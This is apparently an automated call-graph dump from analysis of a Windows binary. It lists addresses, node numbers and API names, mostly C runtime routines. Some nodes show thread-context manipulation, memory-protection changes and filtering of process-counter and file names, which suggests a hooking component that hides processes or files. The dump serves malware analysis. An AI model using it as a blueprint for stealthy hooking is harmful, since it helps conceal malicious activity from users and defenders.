8025->7901 8026->8027 8027->8024 8029 1780dd2ef1f 8028->8029 8030 1780dd2ef02 8028->8030 8032 1780dd2ef29 8029->8032 8110 1780dd319f0 8029->8110 8030->8029 8031 1780dd2ef10 8030->8031 8033 1780dd2d1f4 __free_lconv_num 13 API calls 8031->8033 8117 1780dd31a40 8032->8117 8036 1780dd2ef15 8033->8036 8036->7937 8038 1780dd313e0 8037->8038 8039 1780dd313f5 8038->8039 8041 1780dd3140e 8038->8041 8040 1780dd2d1f4 __free_lconv_num 13 API calls 8039->8040 8042 1780dd313fa 8040->8042 8043 1780dd31405 8041->8043 8045 1780dd2dd78 14 API calls 8041->8045 8044 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8042->8044 8043->7927 8044->8043 8045->8043 8047 1780dd2dd9c 8046->8047 8048 1780dd2db0b 8046->8048 8047->8048 8049 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 8047->8049 8048->7951 8054 1780dd2f198 8048->8054 8050 1780dd2ddb7 8049->8050 8136 1780dd2ffb4 8050->8136 8055 1780dd2f1a9 8054->8055 8056 1780dd2f1ca 8054->8056 8055->8056 8144 1780dd2ef88 8055->8144 8056->7951 8059 1780dd2d35a 8058->8059 8060 1780dd2d336 8058->8060 8061 1780dd2d3bf 8059->8061 8062 1780dd2d35f 8059->8062 8063 1780dd2d2a0 __free_lconv_num 13 API calls 8060->8063 8069 1780dd2d345 FindFirstFileExW 8060->8069 8163 1780dd2ec58 8061->8163 8065 1780dd2d374 8062->8065 8067 1780dd2d2a0 __free_lconv_num 13 API calls 8062->8067 8062->8069 8063->8069 8068 1780dd2c5d0 14 API calls 8065->8068 8067->8065 8068->8069 8069->7955 8069->7969 8081 1780dd2d4fa 8080->8081 8082 1780dd2d4d6 8080->8082 8083 1780dd2d55f 8081->8083 8084 1780dd2d500 8081->8084 8085 1780dd2d2a0 __free_lconv_num 13 API calls 8082->8085 8089 1780dd2d4e5 8082->8089 8166 1780dd2ece8 8083->8166 8087 1780dd2d515 8084->8087 8084->8089 8090 1780dd2d2a0 __free_lconv_num 13 API calls 8084->8090 8085->8089 8091 1780dd2c5d0 14 API calls 8087->8091 8089->7969 8090->8087 8091->8089 8103 1780dd30b52 8102->8103 8104 1780dd2d1f4 __free_lconv_num 13 API calls 8103->8104 8109 1780dd30b67 8103->8109 8105 1780dd30b5c 8104->8105 8106 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8105->8106 8106->8109 8107 1780dd28070 _invalid_parameter_noinfo 8 API calls 8108 1780dd30ea8 8107->8108 8108->7968 8109->8107 8111 1780dd319f9 8110->8111 8112 1780dd31a12 HeapSize 8110->8112 8113 1780dd2d1f4 __free_lconv_num 13 API calls 8111->8113 8114 1780dd319fe 8113->8114 8115 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8114->8115 8116 1780dd31a09 8115->8116 8116->8032 8118 1780dd31a5f 8117->8118 8119 1780dd31a55 8117->8119 8121 1780dd31a64 8118->8121 8127 1780dd31a6b _invalid_parameter_noinfo 8118->8127 8129 1780dd2c5d0 8119->8129 8122 1780dd2d2a0 __free_lconv_num 13 API calls 8121->8122 8125 1780dd31a5d 8122->8125 8123 1780dd31a9e HeapReAlloc 8123->8125 8123->8127 8124 1780dd31a71 8126 1780dd2d1f4 __free_lconv_num 13 API calls 8124->8126 8125->8036 8126->8125 8127->8123 8127->8124 8128 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8127->8128 8128->8127 8130 1780dd2c61b 8129->8130 8131 1780dd2c5df _invalid_parameter_noinfo 8129->8131 8132 1780dd2d1f4 __free_lconv_num 13 API calls 8130->8132 8131->8130 8133 1780dd2c602 HeapAlloc 8131->8133 8135 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8131->8135 8134 1780dd2c619 8132->8134 8133->8131 8133->8134 8134->8125 8135->8131 8137 1780dd2ffc9 8136->8137 8139 1780dd2ddda 8136->8139 8138 1780dd30a40 _invalid_parameter_noinfo 14 API calls 8137->8138 8137->8139 8138->8139 8140 1780dd30020 8139->8140 8141 1780dd30035 8140->8141 8143 1780dd30048 8140->8143 8142 1780dd2e8c4 _invalid_parameter_noinfo 14 API calls 8141->8142 8141->8143 8142->8143 8143->8048 8145 1780dd2f078 8144->8145 8157 1780dd2efbd __vcrt_InitializeCriticalSectionEx 8144->8157 8162 1780dd2c558 EnterCriticalSection 8145->8162 8147 1780dd2efe2 LoadLibraryExW 8148 1780dd2f107 8147->8148 8149 1780dd2f007 GetLastError 8147->8149 8151 1780dd2f120 GetProcAddress 8148->8151 8152 1780dd2f117 FreeLibrary 8148->8152 8149->8157 8151->8145 8152->8151 8157->8145 8157->8147 8157->8151 8160 1780dd2f041 LoadLibraryExW 8157->8160 8160->8148 8160->8157 8165 1780dd2ec61 MultiByteToWideChar 8163->8165 8168 1780dd2ed0c WideCharToMultiByte 8166->8168 8169 1780dd3465f 8170 1780dd346e2 8169->8170 8171 1780dd34677 8169->8171 8171->8170 8172 1780dd29324 __CxxCallCatchBlock 9 API calls 8171->8172 8173 1780dd346c4 8172->8173 8174 1780dd29324 __CxxCallCatchBlock 9 API calls 8173->8174 8175 1780dd346d9 8174->8175 8176 1780dd2c2f4 14 API calls 8175->8176 8176->8170 8177 1780dd3485e 8178 1780dd29324 __CxxCallCatchBlock 9 API calls 8177->8178 8179 1780dd3486c 8178->8179 8180 1780dd34877 8179->8180 8181 1780dd29324 __CxxCallCatchBlock 9 API calls 8179->8181 8181->8180 8659 1780dd225dc 8660 1780dd2265a 8659->8660 8661 1780dd226bf GetFileType 8660->8661 8668 1780dd22777 8660->8668 8662 1780dd226cd StrCpyW 8661->8662 8663 1780dd226e1 8661->8663 8667 1780dd226ee 8662->8667 8664 1780dd21ad4 4 API calls 8663->8664 8664->8667 8665 1780dd23f88 StrCmpNIW 8665->8667 8666 1780dd23708 4 API calls 8666->8667 8667->8665 8667->8666 8667->8668 8669 1780dd21dd4 2 API calls 8667->8669 8669->8667 9106 1780dd2f6dc 9107 1780dd2f6e8 9106->9107 9108 1780dd2f70f 9107->9108 9110 1780dd31c0c 9107->9110 9111 1780dd31c4c 9110->9111 9112 1780dd31c11 9110->9112 9111->9107 9113 1780dd31c32 DeleteCriticalSection 9112->9113 9114 1780dd31c44 9112->9114 9113->9113 9113->9114 9115 1780dd2d2a0 __free_lconv_num 13 API calls 9114->9115 9115->9111 8670 1780dd263e3 8671 1780dd263f0 8670->8671 8672 1780dd2655a 8671->8672 8673 1780dd263fc GetThreadContext 8671->8673 8676 1780dd26581 VirtualProtect FlushInstructionCache 8672->8676 8678 1780dd2663e 8672->8678 8673->8672 8674 1780dd26422 8673->8674 8674->8672 8675 1780dd26449 8674->8675 8681 1780dd264a6 SetThreadContext 8675->8681 8682 1780dd264cd 8675->8682 8676->8672 8677 1780dd2665e 8679 1780dd25530 3 API calls 8677->8679 8678->8677 8680 1780dd24b20 VirtualFree 8678->8680 8685 1780dd26663 8679->8685 8680->8677 8681->8682 8683 1780dd266b7 8686 1780dd28070 _invalid_parameter_noinfo 8 API calls 8683->8686 8684 1780dd26677 ResumeThread 8684->8685 8685->8683 8685->8684 8687 1780dd266ff 8686->8687 8900 1780dd27f60 8901 1780dd27f7c 8900->8901 8902 1780dd27f81 8900->8902 8904 1780dd28090 8901->8904 8905 1780dd280b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8904->8905 8906 1780dd28127 8904->8906 8905->8906 8906->8902 8907 1780dd33960 8917 1780dd28ca0 8907->8917 8909 1780dd33988 8911 1780dd29324 __CxxCallCatchBlock 9 API calls 8912 1780dd33998 8911->8912 8913 1780dd29324 __CxxCallCatchBlock 9 API calls 8912->8913 8914 1780dd339a1 8913->8914 8915 1780dd2c2f4 14 API calls 8914->8915 8916 1780dd339aa 8915->8916 8920 1780dd28cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8917->8920 8918 1780dd28dd1 8918->8909 8918->8911 8919 1780dd28d94 RtlUnwindEx 8919->8920 8920->8918 8920->8919 9116 1780dd306e0 9117 1780dd306e9 9116->9117 9118 1780dd306f9 9116->9118 9119 1780dd2d1f4 __free_lconv_num 13 API calls 9117->9119 9120 1780dd306ee 9119->9120 9121 1780dd2d04c _invalid_parameter_noinfo 38 API calls 9120->9121 9121->9118 8688 1780dd333e4 8689 1780dd333fb 8688->8689 8690 1780dd333f5 CloseHandle 8688->8690 8690->8689 8691 1780dd2f3e4 8692 1780dd2f41d 8691->8692 8693 1780dd2f3ee 8691->8693 8693->8692 8694 1780dd2f403 FreeLibrary 8693->8694 8694->8693 8182 1780dd2820c 8189 1780dd28f34 8182->8189 8185 1780dd28219 8190 1780dd29340 __CxxCallCatchBlock 9 API calls 8189->8190 8191 1780dd28215 8190->8191 8191->8185 8192 1780dd2c288 8191->8192 8193 1780dd2cb10 __free_lconv_num 13 API calls 8192->8193 8194 1780dd28222 8193->8194 8194->8185 8195 1780dd28f48 8194->8195 8198 1780dd292dc 8195->8198 8197 1780dd28f51 8197->8185 8199 1780dd292ed 8198->8199 8203 1780dd29302 8198->8203 8200 1780dd29c8c __CxxCallCatchBlock 6 API calls 8199->8200 8201 1780dd292f2 8200->8201 8204 1780dd29cd4 8201->8204 8203->8197 8205 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8204->8205 8206 1780dd29d02 8205->8206 8207 1780dd29d14 TlsSetValue 8206->8207 8208 1780dd29d0c 8206->8208 8207->8208 8208->8203 8930 1780dd28f0c 8937 1780dd2946c 8930->8937 8933 1780dd28f19 8938 1780dd29474 8937->8938 8940 1780dd294a5 8938->8940 8942 1780dd28f15 8938->8942 8954 1780dd29d28 8938->8954 8941 1780dd294b4 __vcrt_uninitialize_locks DeleteCriticalSection 8940->8941 8941->8942 8942->8933 8943 1780dd29400 8942->8943 8959 1780dd29bfc 8943->8959 8955 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8954->8955 8956 1780dd29d5e 8955->8956 8957 1780dd29d68 8956->8957 8958 1780dd29d73 InitializeCriticalSectionAndSpinCount 8956->8958 8957->8938 8958->8957 8960 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8959->8960 8961 1780dd29c21 TlsAlloc 8960->8961 9122 1780dd25c8d 9123 1780dd25c94 9122->9123 9124 1780dd25cfb 9123->9124 9125 1780dd25d77 VirtualProtect 9123->9125 9126 1780dd25da3 GetLastError 9125->9126 9127 1780dd25db1 9125->9127 9126->9127 8209 1780dd34611 __scrt_dllmain_exception_filter 8963 1780dd2c510 8964 1780dd2c518 8963->8964 8965 1780dd2c545 8964->8965 8967 1780dd2c574 8964->8967 8968 1780dd2c59f 8967->8968 8969 1780dd2c582 DeleteCriticalSection 8968->8969 8970 1780dd2c5a3 8968->8970 8969->8968 8970->8965 8210 1780dd25ff9 8211 1780dd26000 VirtualProtect 8210->8211 8212 1780dd26029 GetLastError 8211->8212 8213 1780dd25f10 8211->8213 8212->8213 8214 1780dd241f9 8217 1780dd24146 8214->8217 8215 1780dd241b0 8216 1780dd24196 VirtualQuery 8216->8215 8216->8217 8217->8215 8217->8216 8218 1780dd241ca VirtualAlloc 8217->8218 8218->8215 8219 1780dd241fb GetLastError 8218->8219 8219->8217 8220 1780dd2cbfc 8225 1780dd2f3a0 8220->8225 8222 1780dd2cc05 8223 1780dd2cb10 __free_lconv_num 13 API calls 8222->8223 8224 1780dd2cc22 __vcrt_uninitialize_ptd 8222->8224 8223->8224 8226 1780dd2f3b1 8225->8226 8227 1780dd2f3b5 8225->8227 8226->8222 8227->8226 8228 1780dd2ef88 9 API calls 8227->8228 8228->8226 9128 1780dd3387c 9129 1780dd338b4 __GSHandlerCheckCommon 9128->9129 9130 1780dd338e0 9129->9130 9132 1780dd29a24 9129->9132 9133 1780dd29324 __CxxCallCatchBlock 9 API calls 9132->9133 9134 1780dd29a4e 9133->9134 9135 1780dd29324 __CxxCallCatchBlock 9 API calls 9134->9135 9136 1780dd29a5b 9135->9136 9137 1780dd29324 __CxxCallCatchBlock 9 API calls 9136->9137 9138 1780dd29a64 9137->9138 9138->9130 8695 1780dd2c180 8698 1780dd2bf38 8695->8698 8705 1780dd2bf00 8698->8705 8706 1780dd2bf10 8705->8706 8707 1780dd2bf15 8705->8707 8708 1780dd2bebc 13 API calls 8706->8708 8709 1780dd2bf1c 8707->8709 8708->8707 8710 1780dd2bf2c 8709->8710 8711 1780dd2bf31 8709->8711 8712 1780dd2bebc 13 API calls 8710->8712 8713 1780dd2bebc 8711->8713 8712->8711 8714 1780dd2bef2 8713->8714 8715 1780dd2bec1 8713->8715 8716 1780dd2beea 8715->8716 8717 1780dd2d2a0 __free_lconv_num 13 API calls 8715->8717 8718 1780dd2d2a0 __free_lconv_num 13 API calls 8716->8718 8717->8715 8718->8714 8971 1780dd22300 8972 1780dd22331 8971->8972 8973 1780dd22412 8972->8973 8974 1780dd22447 8972->8974 8980 1780dd22355 8972->8980 8975 1780dd224bb 8974->8975 8976 1780dd2244c 8974->8976 8975->8973 8978 1780dd235c8 11 API calls 8975->8978 8988 1780dd235c8 GetProcessHeap HeapAlloc 8976->8988 8978->8973 8979 1780dd2238d StrCmpNIW 8979->8980 8980->8973 8980->8979 8982 1780dd21d30 8980->8982 8983 1780dd21d57 GetProcessHeap HeapAlloc 8982->8983 8984 1780dd21db4 8982->8984 8983->8984 8985 1780dd21d92 8983->8985 8984->8980 8986 1780dd21cfc 2 API calls 8985->8986 8987 1780dd21d9a GetProcessHeap HeapFree 8986->8987 8987->8984 8993 1780dd2361b 8988->8993 8989 1780dd236d9 GetProcessHeap HeapFree 8989->8973 8990 1780dd236d4 8990->8989 8991 1780dd23666 StrCmpNIW 8991->8993 8992 1780dd21d30 6 API calls 8992->8993 8993->8989 8993->8990 8993->8991 8993->8992 8994 1780dd2b500 8999 1780dd2c558 EnterCriticalSection 8994->8999 8229 1780dd2c828 8230 1780dd2c82d 8229->8230 8231 1780dd2c842 8229->8231 8235 1780dd2c848 8230->8235 8236 1780dd2c88a 8235->8236 8237 1780dd2c892 8235->8237 8238 1780dd2d2a0 __free_lconv_num 13 API calls 8236->8238 8239 1780dd2d2a0 __free_lconv_num 13 API calls 8237->8239 8238->8237 8240 1780dd2c89f 8239->8240 8241 1780dd2d2a0 __free_lconv_num 13 API calls 8240->8241 8242 1780dd2c8ac 8241->8242 8243 1780dd2d2a0 __free_lconv_num 13 API calls 8242->8243 8244 1780dd2c8b9 8243->8244 8245 1780dd2d2a0 __free_lconv_num 13 API calls 8244->8245 8246 1780dd2c8c6 8245->8246 8247 1780dd2d2a0 __free_lconv_num 13 API calls 8246->8247 8248 1780dd2c8d3 8247->8248 8249 1780dd2d2a0 __free_lconv_num 13 API calls 8248->8249 8250 1780dd2c8e0 8249->8250 8251 1780dd2d2a0 __free_lconv_num 13 API calls 8250->8251 8252 1780dd2c8ed 8251->8252 8253 1780dd2d2a0 __free_lconv_num 13 API calls 8252->8253 8254 1780dd2c8fd 8253->8254 8255 1780dd2d2a0 __free_lconv_num 13 API calls 8254->8255 8256 1780dd2c90d 8255->8256 8261 1780dd2c6f8 8256->8261 8275 1780dd2c558 EnterCriticalSection 8261->8275 8719 1780dd233a8 8720 1780dd233cf 8719->8720 8721 1780dd2349c 8720->8721 8722 1780dd233ec PdhGetCounterInfoW 8720->8722 8722->8721 8723 1780dd2340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8722->8723 8724 1780dd23488 GetProcessHeap HeapFree 8723->8724 8725 1780dd23440 StrCmpW 8723->8725 8724->8721 8725->8724 8727 1780dd23455 8725->8727 8727->8724 8728 1780dd23950 StrCmpNW 8727->8728 8729 1780dd239f2 8728->8729 8730 1780dd23982 StrStrW 8728->8730 8729->8727 8730->8729 8731 1780dd2399b StrToIntW 8730->8731 8731->8729 8732 1780dd239c3 8731->8732 8732->8729 8738 1780dd21a30 OpenProcess 8732->8738 8735 1780dd23f88 StrCmpNIW 8736 1780dd239e4 8735->8736 8736->8729 8744 1780dd21cfc 8736->8744 8739 1780dd21ab6 8738->8739 8740 1780dd21a64 K32GetModuleFileNameExW 8738->8740 8739->8729 8739->8735 8741 1780dd21a7e PathFindFileNameW lstrlenW 8740->8741 8742 1780dd21aad CloseHandle 8740->8742 8741->8742 8743 1780dd21a9c StrCpyW 8741->8743 8742->8739 8743->8742 8745 1780dd21d13 8744->8745 8746 1780dd21d1c 8744->8746 8747 1780dd21530 2 API calls 8745->8747 8746->8729 8747->8746 8748 1780dd30fa8 8749 1780dd30fcc 8748->8749 8750 1780dd28070 _invalid_parameter_noinfo 8 API calls 8749->8750 8751 1780dd3100e 8750->8751 9147 1780dd2aaac 9148 1780dd2aad9 __except_validate_context_record 9147->9148 9149 1780dd29324 __CxxCallCatchBlock 9 API calls 9148->9149 9150 1780dd2aade 9149->9150 9153 1780dd2ab38 9150->9153 9154 1780dd2abc6 9150->9154 9161 1780dd2ab8c 9150->9161 9151 1780dd2ac34 9151->9161 9189 1780dd2a22c 9151->9189 9152 1780dd2abb3 9176 1780dd295d0 9152->9176 9153->9152 9153->9161 9162 1780dd2ab5a __GetCurrentState 9153->9162 9158 1780dd2abe5 9154->9158 9183 1780dd299cc 9154->9183 9158->9151 9158->9161 9186 1780dd299e0 9158->9186 9159 1780dd2acdd 9162->9159 9164 1780dd2afb8 9162->9164 9165 1780dd299cc Is_bad_exception_allowed 9 API calls 9164->9165 9166 1780dd2afe7 __GetCurrentState 9165->9166 9167 1780dd29324 __CxxCallCatchBlock 9 API calls 9166->9167 9174 1780dd2b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9167->9174 9168 1780dd2b0fb 9169 1780dd29324 __CxxCallCatchBlock 9 API calls 9168->9169 9170 1780dd2b100 9169->9170 9171 1780dd2b10b __FrameHandler3::GetHandlerSearchState 9170->9171 9172 1780dd29324 __CxxCallCatchBlock 9 API calls 9170->9172 9171->9161 9172->9171 9173 1780dd299cc 9 API calls Is_bad_exception_allowed 9173->9174 9174->9168 9174->9171 9174->9173 9175 1780dd299f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9174->9175 9175->9174 9246 1780dd29634 9176->9246 9178 1780dd295ef __FrameHandler3::ExecutionInCatch 9250 1780dd29540 9178->9250 9181 1780dd2afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9182 1780dd29624 9181->9182 9182->9161 9184 1780dd29324 __CxxCallCatchBlock 9 API calls 9183->9184 9185 1780dd299d5 9184->9185 9185->9158 9187 1780dd29324 __CxxCallCatchBlock 9 API calls 9186->9187 9188 1780dd299e9 9187->9188 9188->9151 9254 1780dd2b144 9189->9254 9191 1780dd2a6f4 9192 1780dd2a645 9192->9191 9232 1780dd2a643 9192->9232 9307 1780dd2a6fc 9192->9307 9193 1780dd2a373 9193->9192 9237 1780dd2a3ab 9193->9237 9194 1780dd29324 __CxxCallCatchBlock 9 API calls 9196 1780dd2a687 9194->9196 9196->9191 9201 1780dd28070 _invalid_parameter_noinfo 8 API calls 9196->9201 9197 1780dd2a575 9203 1780dd299cc Is_bad_exception_allowed 9 API calls 9197->9203 9205 1780dd2a592 9197->9205 9197->9232 9198 1780dd29324 __CxxCallCatchBlock 9 API calls 9200 1780dd2a2da 9198->9200 9200->9196 9204 1780dd29324 __CxxCallCatchBlock 9 API calls 9200->9204 9202 1780dd2a69a 9201->9202 9202->9161 9203->9205 9207 1780dd2a2ea 9204->9207 9208 1780dd2a5b4 9205->9208 9205->9232 9300 1780dd295a4 9205->9300 9209 1780dd29324 __CxxCallCatchBlock 9 API calls 9207->9209 9210 1780dd2a5ca 9208->9210 9211 1780dd2a6d7 9208->9211 9208->9232 9212 1780dd2a2f3 9209->9212 9215 1780dd2a5d5 9210->9215 9216 1780dd299cc Is_bad_exception_allowed 9 API calls 9210->9216 9213 1780dd29324 __CxxCallCatchBlock 9 API calls 9211->9213 9265 1780dd29a0c 9212->9265 9217 1780dd2a6dd 9213->9217 9220 1780dd2b1dc 9 API calls 9215->9220 9216->9215 9219 1780dd29324 __CxxCallCatchBlock 9 API calls 9217->9219 9222 1780dd2a6e6 9219->9222 9223 1780dd2a5eb 9220->9223 9221 1780dd299e0 9 API calls 9221->9237 9225 1780dd2c2f4 14 API calls 9222->9225 9227 1780dd29634 __SetUnwindTryBlock RtlLookupFunctionEntry 9223->9227 9223->9232 9224 1780dd29324 __CxxCallCatchBlock 9 API calls 9226 1780dd2a335 9224->9226 9225->9191 9226->9193 9229 1780dd29324 __CxxCallCatchBlock 9 API calls 9226->9229 9228 1780dd2a605 9227->9228 9304 1780dd29838 RtlUnwindEx 9228->9304 9231 1780dd2a341 9229->9231 9233 1780dd29324 __CxxCallCatchBlock 9 API calls 9231->9233 9232->9194 9235 1780dd2a34a 9233->9235 9268 1780dd2b1dc 9235->9268 9237->9197 9237->9221 9279 1780dd2a96c 9237->9279 9293 1780dd2a158 9237->9293 9240 1780dd2a35e 9275 1780dd2b2cc 9240->9275 9242 1780dd2a6d1 9243 1780dd2c2f4 14 API calls 9242->9243 9243->9211 9244 1780dd2a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9244->9242 9245 1780dd29178 Concurrency::cancel_current_task 2 API calls 9244->9245 9245->9242 9247 1780dd29662 __FrameHandler3::ExecutionInCatch 9246->9247 9248 1780dd296d4 9247->9248 9249 1780dd2968c RtlLookupFunctionEntry 9247->9249 9248->9178 9249->9247 9251 1780dd2958b 9250->9251 9252 1780dd29560 9250->9252 9251->9181 9252->9251 9253 1780dd29324 __CxxCallCatchBlock 9 API calls 9252->9253 9253->9252 9255 1780dd2b169 __FrameHandler3::ExecutionInCatch 9254->9255 9256 1780dd29634 __SetUnwindTryBlock RtlLookupFunctionEntry 9255->9256 9257 1780dd2b17e 9256->9257 9319 1780dd29db4 9257->9319 9260 1780dd2b1b3 9262 1780dd29db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9260->9262 9261 1780dd2b190 __FrameHandler3::GetHandlerSearchState 9322 1780dd29dec 9261->9322 9263 1780dd2a28e 9262->9263 9263->9191 9263->9193 9263->9198 9266 1780dd29324 __CxxCallCatchBlock 9 API calls 9265->9266 9267 1780dd29a1a 9266->9267 9267->9191 9267->9224 9269 1780dd2b2c3 9268->9269 9274 1780dd2b207 9268->9274 9270 1780dd2a35a 9270->9193 9270->9240 9271 1780dd299e0 9 API calls 9271->9274 9272 1780dd299cc Is_bad_exception_allowed 9 API calls 9272->9274 9273 1780dd2a96c 9 API calls 9273->9274 9274->9270 9274->9271 9274->9272 9274->9273 9276 1780dd2b339 9275->9276 9278 1780dd2b2e9 Is_bad_exception_allowed 9275->9278 9276->9244 9277 1780dd299cc 9 API calls Is_bad_exception_allowed 9277->9278 9278->9276 9278->9277 9280 1780dd2aa28 9279->9280 9281 1780dd2a999 9279->9281 9280->9237 9282 1780dd299cc Is_bad_exception_allowed 9 API calls 9281->9282 9283 1780dd2a9a2 9282->9283 9283->9280 9284 1780dd299cc Is_bad_exception_allowed 9 API calls 9283->9284 9285 1780dd2a9bb 9283->9285 9284->9285 9285->9280 9286 1780dd2a9e7 9285->9286 9287 1780dd299cc Is_bad_exception_allowed 9 API calls 9285->9287 9288 1780dd299e0 9 API calls 9286->9288 9287->9286 9289 1780dd2a9fb 9288->9289 9289->9280 9290 1780dd2aa14 9289->9290 9291 1780dd299cc Is_bad_exception_allowed 9 API calls 9289->9291 9292 1780dd299e0 9 API calls 9290->9292 9291->9290 9292->9280 9294 1780dd29634 __SetUnwindTryBlock RtlLookupFunctionEntry 9293->9294 9295 1780dd2a195 9294->9295 9296 1780dd299cc Is_bad_exception_allowed 9 API calls 9295->9296 9297 1780dd2a1cd 9296->9297 9298 1780dd29838 9 API calls 9297->9298 9299 1780dd2a211 9298->9299 9299->9237 9301 1780dd295b8 __FrameHandler3::ExecutionInCatch 9300->9301 9302 1780dd29540 __FrameHandler3::ExecutionInCatch 9 API calls 9301->9302 9303 1780dd295c2 9302->9303 9303->9208 9305 1780dd28070 _invalid_parameter_noinfo 8 API calls 9304->9305 9306 1780dd29932 9305->9306 9306->9232 9308 1780dd2a735 9307->9308 9313 1780dd2a948 9307->9313 9309 1780dd29324 __CxxCallCatchBlock 9 API calls 9308->9309 9310 1780dd2a73a 9309->9310 9311 1780dd2a759 EncodePointer 9310->9311 9314 1780dd2a7ac 9310->9314 9312 1780dd29324 __CxxCallCatchBlock 9 API calls 9311->9312 9315 1780dd2a769 9312->9315 9313->9232 9314->9313 9317 1780dd299cc 9 API calls Is_bad_exception_allowed 9314->9317 9318 1780dd2a158 19 API calls 9314->9318 9315->9314 9325 1780dd294ec 9315->9325 9317->9314 9318->9314 9320 1780dd29634 __SetUnwindTryBlock RtlLookupFunctionEntry 9319->9320 9321 1780dd29dc7 9320->9321 9321->9260 9321->9261 9323 1780dd29634 __SetUnwindTryBlock RtlLookupFunctionEntry 9322->9323 9324 1780dd29e06 9323->9324 9324->9263 9326 1780dd29324 __CxxCallCatchBlock 9 API calls 9325->9326 9327 1780dd29518 9326->9327 9327->9314 8277 1780dd26430 8278 1780dd2643d 8277->8278 8280 1780dd26449 8278->8280 8286 1780dd2655a 8278->8286 8279 1780dd264cd 8280->8279 8281 1780dd264a6 SetThreadContext 8280->8281 8281->8279 8282 1780dd2663e 8284 1780dd2665e 8282->8284 8293 1780dd24b20 8282->8293 8283 1780dd26581 VirtualProtect FlushInstructionCache 8283->8286 8297 1780dd25530 GetCurrentProcess 8284->8297 8286->8282 8286->8283 8288 1780dd266b7 8291 1780dd28070 _invalid_parameter_noinfo 8 API calls 8288->8291 8289 1780dd26677 ResumeThread 8290 1780dd26663 8289->8290 8290->8288 8290->8289 8292 1780dd266ff 8291->8292 8295 1780dd24b3c 8293->8295 8294 1780dd24b9f 8294->8284 8295->8294 8296 1780dd24b52 VirtualFree 8295->8296 8296->8295 8298 1780dd2554c 8297->8298 8299 1780dd25562 VirtualProtect FlushInstructionCache 8298->8299 8300 1780dd25593 8298->8300 8299->8298 8300->8290 8301 1780dd2ec30 GetCommandLineA GetCommandLineW 9003 1780dd2bd34 9004 1780dd2bd49 9003->9004 9005 1780dd2bd4d 9003->9005 9006 1780dd2e864 56 API calls 9005->9006 9007 1780dd2bd52 9006->9007 9018 1780dd2edc8 GetEnvironmentStringsW 9007->9018 9010 1780dd2bd6b 9038 1780dd2bda8 9010->9038 9011 1780dd2bd5f 9013 1780dd2d2a0 __free_lconv_num 13 API calls 9011->9013 9013->9004 9015 1780dd2d2a0 __free_lconv_num 13 API calls 9016 1780dd2bd92 9015->9016 9017 1780dd2d2a0 __free_lconv_num 13 API calls 9016->9017 9017->9004 9019 1780dd2edf8 9018->9019 9020 1780dd2bd57 9018->9020 9021 1780dd2ece8 WideCharToMultiByte 9019->9021 9020->9010 9020->9011 9022 1780dd2ee49 9021->9022 9023 1780dd2ee53 FreeEnvironmentStringsW 9022->9023 9024 1780dd2c5d0 14 API calls 9022->9024 9023->9020 9025 1780dd2ee63 9024->9025 9026 1780dd2ee6b 9025->9026 9027 1780dd2ee74 9025->9027 9029 1780dd2d2a0 __free_lconv_num 13 API calls 9026->9029 9028 1780dd2ece8 WideCharToMultiByte 9027->9028 9031 1780dd2ee97 9028->9031 9030 1780dd2ee72 9029->9030 9030->9023 9032 1780dd2ee9b 9031->9032 9033 1780dd2eea5 9031->9033 9034 1780dd2d2a0 __free_lconv_num 13 API calls 9032->9034 9035 1780dd2d2a0 __free_lconv_num 13 API calls 9033->9035 9036 1780dd2eea3 FreeEnvironmentStringsW 9034->9036 9035->9036 9036->9020 9039 1780dd2bdcd 9038->9039 9040 1780dd2d220 _invalid_parameter_noinfo 13 API calls 9039->9040 9051 1780dd2be03 9040->9051 9041 1780dd2be0b 9042 1780dd2d2a0 __free_lconv_num 13 API calls 9041->9042 9044 1780dd2bd73 9042->9044 9043 1780dd2be6d 9045 1780dd2d2a0 __free_lconv_num 13 API calls 9043->9045 9044->9015 9045->9044 9046 1780dd2d220 _invalid_parameter_noinfo 13 API calls 9046->9051 9047 1780dd2be92 9048 1780dd2bebc 13 API calls 9047->9048 9050 1780dd2be9a 9048->9050 9049 1780dd2c328 __std_exception_copy 38 API calls 9049->9051 9053 1780dd2d2a0 __free_lconv_num 13 API calls 9050->9053 9051->9041 9051->9043 9051->9046 9051->9047 9051->9049 9052 1780dd2bea6 9051->9052 9054 1780dd2d2a0 __free_lconv_num 13 API calls 9051->9054 9055 1780dd2d06c _invalid_parameter_noinfo 17 API calls 9052->9055 9053->9041 9054->9051 9056 1780dd2beb9 9055->9056 9328 1780dd22ab4 TlsGetValue TlsGetValue TlsGetValue 9329 1780dd22b0d 9328->9329 9331 1780dd22b79 9328->9331 9329->9331 9332 1780dd22b15 9329->9332 9330 1780dd22b74 9331->9330 9333 1780dd22c32 TlsSetValue TlsSetValue TlsSetValue 9331->9333 9335 1780dd23f88 StrCmpNIW 9331->9335 9332->9330 9332->9333 9334 1780dd23f88 StrCmpNIW 9332->9334 9333->9330 9334->9332 9335->9331 8302 1780dd2c218 8303 1780dd2d2a0 __free_lconv_num 13 API calls 8302->8303 8304 1780dd2c228 8303->8304 8305 1780dd2d2a0 __free_lconv_num 13 API calls 8304->8305 8306 1780dd2c23c 8305->8306 8307 1780dd2d2a0 __free_lconv_num 13 API calls 8306->8307 8308 1780dd2c250 8307->8308 8309 1780dd2d2a0 __free_lconv_num 13 API calls 8308->8309 8310 1780dd2c264 8309->8310 9057 1780dd22518 GetProcessIdOfThread GetCurrentProcessId 9058 1780dd225be 9057->9058 9059 1780dd22543 CreateFileW 9057->9059 9059->9058 9060 1780dd22577 WriteFile ReadFile CloseHandle 9059->9060 9060->9058 8752 1780dd31398 8753 1780dd313ae 